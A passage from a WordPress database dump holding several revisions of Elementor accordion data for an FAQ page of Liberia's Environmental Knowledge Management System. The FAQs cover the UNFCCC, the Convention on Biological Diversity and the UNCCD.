Content\",\"_id\":\"bc9c821\"}],\"icon_color\":\"#000000\",\"content_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49d848d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"396f528\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"30a8e68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d1091e\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNFCCC\",\"title_color\":\"#126b37\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2aefce2\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"When should I accredit myself for UNFCCC meetings?\",\"tab_content\":\"<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.<\\/p>\",\"_id\":\"a4d8544\"},{\"tab_title\":\"I want to get graphs and data about climate change. What is available and can I use it?\",\"tab_content\":\"<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.<\\/p>\",\"_id\":\"3148a01\"},{\"tab_title\":\"Are UNFCCC meetings open to the general public?\",\"tab_content\":\"<p>No, each participant must be properly accredited and registered.<\\/p>\",\"_id\":\"872f5c5\"},{\"tab_title\":\"Who can participate in UNFCCC meetings and how do they accredit themselves?\",\"tab_content\":\"<p>There are different participation groups at UNFCCC meetings; these include:<\\/p><ol><li><p><strong>Government delegate<\\/strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and\\/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/parties_observers\\/parties\\/national_focal_points\\/items\\/9336.php\\\">National Focal Point<\\/a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.<\\/p><\\/li><li><p><strong>Observers<\\/strong>\\u00a0from admitted\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-ngos\\\" target=\\\"_self\\\">non-governmental<\\/a>\\u00a0or\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-igos\\\" target=\\\"_self\\\">intergovernmental<\\/a>\\u00a0organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the\\u00a0<a href=\\\"https:\\/\\/onlinereg.unfccc.int\\/\\\">online registration system<\\/a>\\u00a0(ORS). Please see the\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/overview\\\" target=\\\"_self\\\">civil society<\\/a>\\u00a0web page for more information.<\\/p><\\/li><li><p><strong>Observer<\\/strong>\\u00a0from a United Nations organization or specialized agency. Nominations are received from the respective organization.<\\/p><\\/li><li><p><strong>Member of the press<\\/strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/press\\/calender_of_events\\/accreditation\\/items\\/2987.php\\\">accreditation section<\\/a>.<\\/p><\\/li><\\/ol>\",\"_id\":\"34ce7e2\"},{\"tab_title\":\"What is the purpose of the UNFCCC?\",\"tab_content\":\"<p>The\\u00a0UN Framework Convention on Climate Change\\u00a0(UNFCCC) is an intergovernmental treaty developed to address the problem of\\u00a0climate change.<\\/p>\",\"_id\":\"5364766\"},{\"tab_title\":\"What is climate neutrality?\",\"tab_content\":\"<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth\'s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.<\\/p>\",\"_id\":\"2cf3095\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"034d9e3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f12a46\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"00a6661\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e527259\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCBD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0f30fd\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the UNCBD?\",\"tab_content\":\"<p>The\\u00a0Convention on Biological Diversity\\u00a0(CBD)\\u00a0is\\u00a0an international legally-binding treaty with three main goals: conservation of\\u00a0biodiversity; sustainable use of\\u00a0biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.<\\/p>\",\"_id\":\"76b731c\"},{\"tab_title\":\"What is conservation of biodiversity?\",\"tab_content\":\"<p>Conservation of biological diversity\\u00a0leads to\\u00a0conservation\\u00a0of essential ecological\\u00a0diversity\\u00a0to preserve the continuity of food chains. The genetic\\u00a0diversity\\u00a0of plants and animals is preserved. Biodiversity conservation\\u00a0serves as an insurance policy for the future.<\\/p>\",\"_id\":\"fc56846\"},{\"tab_title\":\"What is the need of conducting a biodiversity meet?\",\"tab_content\":\"<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.<\\/p>\",\"_id\":\"1c0b9e0\"},{\"tab_title\":\"How can we protect and preserve biodiversity?\",\"tab_content\":\"<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and\\u00a0protect\\u00a0beaches, parks, reserves, and fields where wild plants and animals live.<\\/p>\",\"_id\":\"b0638cd\"},{\"tab_title\":\"What are some factors that affect biodiversity?\",\"tab_content\":\"<p>The loss of\\u00a0biodiversity affects the lives of more than 1 billion people living in dry lands.<br \\/>5 major threats to biodiversity;<br \\/>Climate change<br \\/>Deforestation and habitat loss<br \\/>Over-exploitation<br \\/>Invasive species<br \\/>Pollution<\\/p>\",\"_id\":\"45db245\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9a9393\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f33106f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"81f02fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"971e22b\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCCD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fefb411\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the importance of the UNCCD?\",\"tab_content\":\"<p>The\\u00a0United Nations Convention to Combat Desertification\\u00a0in Those\\u00a0Countries\\u00a0Experiencing Serious Drought and\\/or\\u00a0Desertification, Particularly in Africa (UNCCD) is a\\u00a0Convention to combat desertification\\u00a0and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by\\u00a0<span style=\\\"color: #222222; font-family: georgia, palatino, serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">international cooperation and partnership arrangements.<\\/span><\\/p>\",\"_id\":\"9661246\"},{\"tab_title\":\"Is the UNCCD legally binding?\",\"tab_content\":\"<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management<\\/p>\",\"_id\":\"da9b208\"},{\"tab_title\":\"What is desertification?\",\"tab_content\":\"<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.<\\/p>\",\"_id\":\"c71b5f6\"},{\"tab_title\":\"Why is it important to combat desertification?\",\"tab_content\":\"<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land\'s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined - are at risk of being displaced as a consequence of desertification.<\\/p>\",\"_id\":\"1275d06\"},{\"tab_title\":\"Is desertification a global problem?\",\"tab_content\":\"<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth\'s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world\'s poorest in over one hundred countries are threatened.<\\/p>\",\"_id\":\"0f255fe\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(16825,2522,'_wp_page_template','default'),(16826,2522,'_elementor_edit_mode','builder'),(16827,2522,'_elementor_template_type','wp-page'),(16828,2522,'_elementor_version','2.7.5'),(16829,2522,'_elementor_data','[{\"id\":\"81604c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"635073e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"20a0238\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"heading_color\":\"#196819\",\"color_text\":\"#000000\",\"color_link_hover\":\"#114511\"},\"elements\":[{\"id\":\"3b455ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"GENERAL \",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c396810\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the EKMS?\",\"tab_content\":\"<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other\\u00a0 Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.<\\/p><p>It focuses on how the Rio conventions are being implementation in Liberia.<\\/p>\",\"_id\":\"eb92a21\"},{\"tab_title\":\"Who can contribute to the EKMS?\",\"tab_content\":\"<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.<\\/p>\",\"_id\":\"044d49e\"},{\"tab_title\":\"Accordion Title\",\"tab_content\":\"Accordion Content\",\"_id\":\"bc9c821\"}],\"icon_color\":\"#000000\",\"content_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49d848d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"396f528\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"30a8e68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d1091e\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNFCCC\",\"title_color\":\"#126b37\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2aefce2\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"When should I accredit myself for UNFCCC meetings?\",\"tab_content\":\"<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.<\\/p>\",\"_id\":\"a4d8544\"},{\"tab_title\":\"I want to get graphs and data about climate change. What is available and can I use it?\",\"tab_content\":\"<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.<\\/p>\",\"_id\":\"3148a01\"},{\"tab_title\":\"Are UNFCCC meetings open to the general public?\",\"tab_content\":\"<p>No, each participant must be properly accredited and registered.<\\/p>\",\"_id\":\"872f5c5\"},{\"tab_title\":\"Who can participate in UNFCCC meetings and how do they accredit themselves?\",\"tab_content\":\"<p>There are different participation groups at UNFCCC meetings; these include:<\\/p><ol><li><p><strong>Government delegate<\\/strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and\\/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/parties_observers\\/parties\\/national_focal_points\\/items\\/9336.php\\\">National Focal Point<\\/a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.<\\/p><\\/li><li><p><strong>Observers<\\/strong>\\u00a0from admitted\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-ngos\\\" target=\\\"_self\\\">non-governmental<\\/a>\\u00a0or\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-igos\\\" target=\\\"_self\\\">intergovernmental<\\/a>\\u00a0organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the\\u00a0<a href=\\\"https:\\/\\/onlinereg.unfccc.int\\/\\\">online registration system<\\/a>\\u00a0(ORS). Please see the\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/overview\\\" target=\\\"_self\\\">civil society<\\/a>\\u00a0web page for more information.<\\/p><\\/li><li><p><strong>Observer<\\/strong>\\u00a0from a United Nations organization or specialized agency. Nominations are received from the respective organization.<\\/p><\\/li><li><p><strong>Member of the press<\\/strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/press\\/calender_of_events\\/accreditation\\/items\\/2987.php\\\">accreditation section<\\/a>.<\\/p><\\/li><\\/ol>\",\"_id\":\"34ce7e2\"},{\"tab_title\":\"What is the purpose of the UNFCCC?\",\"tab_content\":\"<p>The\\u00a0UN Framework Convention on Climate Change\\u00a0(UNFCCC) is an intergovernmental treaty developed to address the problem of\\u00a0climate change.<\\/p>\",\"_id\":\"5364766\"},{\"tab_title\":\"What is climate neutrality?\",\"tab_content\":\"<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth\'s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.<\\/p>\",\"_id\":\"2cf3095\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"034d9e3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f12a46\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"00a6661\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e527259\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCBD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0f30fd\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the UNCBD?\",\"tab_content\":\"<p>The\\u00a0Convention on Biological Diversity\\u00a0(CBD)\\u00a0is\\u00a0an international legally-binding treaty with three main goals: conservation of\\u00a0biodiversity; sustainable use of\\u00a0biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.<\\/p>\",\"_id\":\"76b731c\"},{\"tab_title\":\"What is conservation of biodiversity?\",\"tab_content\":\"<p>Conservation of biological diversity\\u00a0leads to\\u00a0conservation\\u00a0of essential ecological\\u00a0diversity\\u00a0to preserve the continuity of food chains. The genetic\\u00a0diversity\\u00a0of plants and animals is preserved. Biodiversity conservation\\u00a0serves as an insurance policy for the future.<\\/p>\",\"_id\":\"fc56846\"},{\"tab_title\":\"What is the need of conducting a biodiversity meet?\",\"tab_content\":\"<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.<\\/p>\",\"_id\":\"1c0b9e0\"},{\"tab_title\":\"How can we protect and preserve biodiversity?\",\"tab_content\":\"<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and\\u00a0protect\\u00a0beaches, parks, reserves, and fields where wild plants and animals live.<\\/p>\",\"_id\":\"b0638cd\"},{\"tab_title\":\"What are some factors that affect biodiversity?\",\"tab_content\":\"<p>The loss of\\u00a0biodiversity affects the lives of more than 1 billion people living in dry lands.<br \\/>5 major threats to biodiversity;<br \\/>Climate change<br \\/>Deforestation and habitat loss<br \\/>Over-exploitation<br \\/>Invasive species<br \\/>Pollution<\\/p>\",\"_id\":\"45db245\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9a9393\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f33106f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"81f02fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"971e22b\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCCD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fefb411\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the importance of the UNCCD?\",\"tab_content\":\"<p>The\\u00a0United Nations Convention to Combat Desertification\\u00a0in Those\\u00a0Countries\\u00a0Experiencing Serious Drought and\\/or\\u00a0Desertification, Particularly in Africa (UNCCD) is a\\u00a0Convention to combat desertification\\u00a0and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by\\u00a0<span style=\\\"color: #222222; font-family: georgia, palatino, serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">international cooperation and partnership arrangements.<\\/span><\\/p>\",\"_id\":\"9661246\"},{\"tab_title\":\"Is the UNCCD legally binding?\",\"tab_content\":\"<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management<\\/p>\",\"_id\":\"da9b208\"},{\"tab_title\":\"What is desertification?\",\"tab_content\":\"<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.<\\/p>\",\"_id\":\"c71b5f6\"},{\"tab_title\":\"Why is it important to combat desertification?\",\"tab_content\":\"<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land\'s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined - are at risk of being displaced as a consequence of desertification.<\\/p>\",\"_id\":\"1275d06\"},{\"tab_title\":\"Is desertification a global problem?\",\"tab_content\":\"<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth\'s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world\'s poorest in over one hundred countries are threatened.<\\/p>\",\"_id\":\"0f255fe\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(16831,2523,'_wp_page_template','default'),(16832,2523,'_elementor_edit_mode','builder'),(16833,2523,'_elementor_template_type','wp-page'),(16834,2523,'_elementor_version','2.7.5'),(16835,2523,'_elementor_data','[{\"id\":\"81604c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"635073e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"20a0238\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"heading_color\":\"#196819\",\"color_text\":\"#000000\",\"color_link_hover\":\"#114511\"},\"elements\":[{\"id\":\"3b455ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"GENERAL \",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c396810\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the EKMS?\",\"tab_content\":\"<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other\\u00a0 Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.<\\/p><p>It focuses on how the Rio conventions are being implementation in Liberia.<\\/p>\",\"_id\":\"eb92a21\"},{\"tab_title\":\"Who can contribute to the EKMS?\",\"tab_content\":\"<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.<\\/p>\",\"_id\":\"044d49e\"},{\"tab_title\":\"How can i discussion on topics?\",\"tab_content\":\"<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own Facebook groups, on Twitter, or Linkedin.<\\/p>\",\"_id\":\"bc9c821\"}],\"icon_color\":\"#000000\",\"content_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49d848d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"396f528\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"30a8e68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d1091e\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNFCCC\",\"title_color\":\"#126b37\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2aefce2\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"When should I accredit myself for UNFCCC meetings?\",\"tab_content\":\"<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.<\\/p>\",\"_id\":\"a4d8544\"},{\"tab_title\":\"I want to get graphs and data about climate change. What is available and can I use it?\",\"tab_content\":\"<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.<\\/p>\",\"_id\":\"3148a01\"},{\"tab_title\":\"Are UNFCCC meetings open to the general public?\",\"tab_content\":\"<p>No, each participant must be properly accredited and registered.<\\/p>\",\"_id\":\"872f5c5\"},{\"tab_title\":\"Who can participate in UNFCCC meetings and how do they accredit themselves?\",\"tab_content\":\"<p>There are different participation groups at UNFCCC meetings; these include:<\\/p><ol><li><p><strong>Government delegate<\\/strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and\\/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/parties_observers\\/parties\\/national_focal_points\\/items\\/9336.php\\\">National Focal Point<\\/a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.<\\/p><\\/li><li><p><strong>Observers<\\/strong>\\u00a0from admitted\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-ngos\\\" target=\\\"_self\\\">non-governmental<\\/a>\\u00a0or\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-igos\\\" target=\\\"_self\\\">intergovernmental<\\/a>\\u00a0organizations. Nominations must be made by the Designated Contact Points of admitted organizations using 